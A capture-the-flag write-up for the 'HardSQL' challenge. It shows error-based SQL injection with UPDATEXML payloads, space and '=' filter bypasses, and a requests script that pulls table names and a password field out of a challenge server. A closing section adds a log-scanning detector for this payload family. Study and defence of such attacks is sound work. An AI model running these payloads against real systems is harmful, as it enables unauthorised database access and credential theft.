# HardSQL

A bit of fuzzing shows that, compared with the earlier EasySQL, several more key characters are filtered, including the space character, and comment syntax is also blocked by the WAF.

Try error-based injection; first write the error-message template:

```
sql = "admin%27or(UPDATEXML(1,CONCAT(0x7e,{},0x7e),1))%23".format(p)
```

For the filtered key positions, two bypass methods are used:

* Replace the spaces around variables with ().
* Use a like() expression in place of =.

The SQL injection script:

```
import requests

# p holds the statement to inject (no spaces allowed; see the queries below).
p = "(SELECT(database()))"
sql = "admin%27or(UPDATEXML(1,concat(0x7e,{},0x7e),1))%23".format(p)
print(sql)

url = "http://640faddd-30eb-4d14-9cc0-4ff5880dbbcd.node3.buuoj.cn/check.php?username={}&password=123123".format(sql)

payload = {}
headers = {}

response = requests.request("GET", url, headers=headers, data=payload)

# The injected result is echoed back inside the MySQL error message.
print(response.text.encode('utf8'))
```

Change p to the injection statement we want to use; note that spaces cannot be used.

Read the database name:

```
p = "(SELECT(database()))"
```

Read the tables:

```
p = "(SELECT(group_concat(table_name))FROM(information_schema.tables)WHERE(table_schema)LIKE('geek'))"
```

Read the columns:

```
p = "(SELECT(group_concat(column_name))FROM(information_schema.columns)WHERE(table_name)LIKE('H4rDsq1'))"
```

Read the column contents:

```
p = "(SELECT(password)FROM(geek.H4rDsq1))"
```

The flag exceeds the length of the returned field, so modify the query to read the second half:

```
p = "(SELECT(right(password,32))FROM(geek.H4rDsq1))"
```
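The write-up shows why a blocklist WAF that only strips spaces and comments is not a fix: the same injection goes through with parentheses in place of spaces and LIKE in place of =. From the defender's side, the durable fix is parameterised queries in check.php; as a complement, requests carrying this payload shape are easy to spot in access logs once the query string is URL-decoded. The following is an added example written for this page, not part of the original write-up or the challenge: it normalises each parameter value (decoding repeatedly so double-encoding cannot hide `%27`/`%23`) and flags the three signals the bypass relies on. The log lines are constructed to mirror the page's payloads; the "METHOD path" log format and the signal names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic) in a minimal
# "METHOD path" form. The first is a normal login; the other two mirror
# the error-based payload shape used in the write-up above.
SAMPLE_LOG = [
    "GET /check.php?username=admin&password=123123",
    "GET /check.php?username=admin%27or(UPDATEXML(1,concat(0x7e,"
    "(SELECT(database())),0x7e),1))%23&password=123123",
    "GET /check.php?username=admin%27or(UPDATEXML(1,concat(0x7e,"
    "(SELECT(group_concat(table_name))FROM(information_schema.tables)"
    "WHERE(table_schema)LIKE('geek')),0x7e),1))%23&password=123123",
]

# Signals for the tricks the write-up relies on, matched on decoded,
# lower-cased values so percent-encoding and case changes do not help.
ERROR_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
# Keyword immediately adjacent to parentheses: the "no spaces" evasion.
SPACELESS_KEYWORDS = re.compile(
    r"\)(from|where|select|and|or)\(|\b(select|from|where)\(", re.I)
# ")LIKE(" standing in for "=" between two parenthesised operands.
LIKE_FOR_EQ = re.compile(r"\)\s*like\s*\(", re.I)


def normalise(value: str) -> str:
    """URL-decode until stable (max 3 rounds) so double-encoded input is seen."""
    prev, cur = None, value
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.lower()


def findings_for_value(value: str) -> list:
    """Return the list of signal names present in one parameter value."""
    norm = normalise(value)
    found = []
    if ERROR_FUNCS.search(norm):
        found.append("error_based_xml_function")
    if SPACELESS_KEYWORDS.search(norm):
        found.append("parenthesis_space_evasion")
    if LIKE_FOR_EQ.search(norm):
        found.append("like_in_place_of_equals")
    return found


def scan_log_line(line: str) -> dict:
    """Map each suspicious query parameter of one log line to its findings."""
    _method, _, target = line.partition(" ")
    query = urlsplit(target).query
    results = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            findings = findings_for_value(value)
            if findings:
                results[name] = findings
    return results


def scan_log(lines) -> list:
    """Return (line_number, findings) for every line that triggered a signal."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = scan_log_line(line)
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {findings}")
```

Run it as a script to see which sample lines trip which signal. The patterns are deliberately narrow (they describe this payload family, not SQL injection in general), so treat a hit as a trigger for review and for auditing the query code, not as a substitute for parameterised statements.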
